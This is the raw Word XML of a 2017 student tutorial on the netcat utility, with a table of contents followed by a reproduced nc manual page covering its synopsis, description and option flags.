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F9B3A" w14:textId="77777777" w:rsidR="00095EC7" w:rsidRDefault="00264426" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264426">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Summer Netcat Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02C60E" w14:textId="77777777" w:rsidR="00264426" w:rsidRDefault="00264426" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Dongqi Guo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874D396" w14:textId="77777777" w:rsidR="00264426" w:rsidRDefault="00264426" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>05/31/2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E60CCA" w14:textId="77777777" w:rsidR="00264426" w:rsidRDefault="00264426" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>At Northeastern University</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40130610" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DC6C27" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D3C155" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072DF3EE" w14:textId="2084B5AD" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Name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02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C956A77" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2232B7" w14:textId="0835118F" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Synopsis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B2800">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="004B2800"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>02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A008E5E" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3693256A" w14:textId="1B0F7773" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Description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03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A036A3F" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8C2672" w14:textId="413AE90E" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Client/Server Model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06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E977D21" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C80397" w14:textId="60552756" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Data Transfer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07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EC0C0" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7711FED6" w14:textId="3DD30707" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Talking to Server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08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A4D75" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D503B0E" w14:textId="68088FC0" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port Scanning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09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F690FC" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44250C2A" w14:textId="2B7FAE3D" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Examples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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F9A37" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CD7444" w14:textId="5C4C2CCE" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote Shell/Backdoor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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C2BE9" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="00377AAF" w:rsidRDefault="006F3040" w:rsidP="006F3040">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200FE335" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040"/>
    <w:p w14:paraId="460F1E83" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040"/>
    <w:p w14:paraId="542AF667" w14:textId="77777777" w:rsidR="006F3040" w:rsidRPr="006F3040" w:rsidRDefault="006F3040" w:rsidP="006F3040"/>
    <w:p w14:paraId="01C7A9C3" w14:textId="7239AD90" w:rsidR="00FC538D" w:rsidRDefault="00FC538D" w:rsidP="00264426">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C4637A" w14:textId="77777777" w:rsidR="00FC538D" w:rsidRDefault="00FC538D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FABAC" w14:textId="368C700A" w:rsidR="00FC538D" w:rsidRDefault="00FC538D" w:rsidP="00FC538D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC3BF9" w14:textId="02AC0D65" w:rsidR="00FC538D" w:rsidRDefault="00C90DC2" w:rsidP="00FC538D">
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00FC538D">
        <w:t xml:space="preserve">nc - </w:t>
      </w:r>
      <w:r w:rsidR="00FC538D" w:rsidRPr="00FC538D">
        <w:t>arbitrary TCP and UDP connections and listens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02385E6D" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="72F380FD" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2">
      <w:r w:rsidRPr="00C90DC2">
        <w:t>SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A85416" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2">
      <w:r w:rsidRPr="00C90DC2">
        <w:t>     nc [-46AcDCdhklnrtUuvz] [-b boundif] [-i interval] [-p source_port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE924F" w14:textId="08F3AA2F" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2">
      <w:r w:rsidRPr="00C90DC2">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="006F3040">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C90DC2">
        <w:t>[-s source_ip_address] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F8AA9" w14:textId="06D493CF" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2">
      <w:r w:rsidRPr="00C90DC2">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="006F3040">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C90DC2">
        <w:t>[--apple-delegate-pid pid] [--apple-delegate-uuid uuid] [--apple-ext-bk-idle]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE75B72" w14:textId="243731A9" w:rsidR="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2">
      <w:r w:rsidRPr="00C90DC2">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="006F3040">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C90DC2">
        <w:t>[--apple-nowakefromsleep] [--apple-ecn mode] [hostname] [port[s]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A7B3D" w14:textId="3FD4A8CF" w:rsidR="00377AAF" w:rsidRDefault="00377AAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A962DE" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842D9C1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     The nc (or netcat) utility is used for just about anything under the sun involving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8ABA9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     TCP or UDP.  It can open TCP connections, send UDP packets, listen on arbitrary TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE5779" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     and UDP ports, do port scanning, and deal with both IPv4 and IPv6.  Unlike telnet(1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE9812" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     nc scripts nicely, and separates error messages onto standard error instead of send-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CBF96" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     ing them to standard output, as telnet(1) does with some.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE9731" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="7D2AE107" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Common uses include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107CC84" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="533DD146" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           o   simple TCP proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059244DF" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           o   shell-script based HTTP clients and servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768DBB4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           o   network daemon testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1672C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           o   a SOCKS or HTTP ProxyCommand for ssh(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FFA92" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           o   and much, much more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C88FB" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="1EFFEC23" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     The options are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12C438" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="79FE7973" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -4      Forces nc to use IPv4 addresses only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32861A34" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="5DA8063E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -6      Forces nc to use IPv6 addresses only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204720F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="4F9874C0" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -A      Set SO_RECV_ANYIF on socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C3D8A5" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="425B0530" w14:textId="45C262D6" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t xml:space="preserve">     -b </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00377AAF">
        <w:t>boundif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E2D4B6" w14:textId="4D56964A" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00377AAF">
        <w:t>Specifies the interface to bind the socket to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71070E86" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="36C524AA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -c      Send CRLF as line-ending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C5C82" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0F15BD66" w14:textId="40052686" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>-D      Enable debugging on the socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA89266" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191CD6F2" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r w:rsidRPr="00377AAF">
        <w:t>-C      Forces nc not to use cellular data context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EBE89" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="6D903F38" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -d      Do not attempt to read from stdin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6430D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="23D7364C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -h      Prints out nc help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124ABCA8" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="5834319A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -i interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FC01A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Specifies a delay time interval between lines of text sent and received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25599983" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Also causes a delay time between connections to multiple ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962F7ED" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="64CE27EC" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -G conntimeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DE6711" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             TCP connection timeout in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624EB51" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="21644ABC" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -H keepidle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F93CCA4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Initial TCP keep alive timeout in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E67DA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="1D82D97C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -I keepintvl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE21DE" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Interval for repeating TCP keep alive timeouts in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C627DA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="17F3A6BF" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     -J keepcnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7950AAF9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>             Number of times to repeat TCP keep alive packets.</w:t>
      </w:r>
    </w:p>
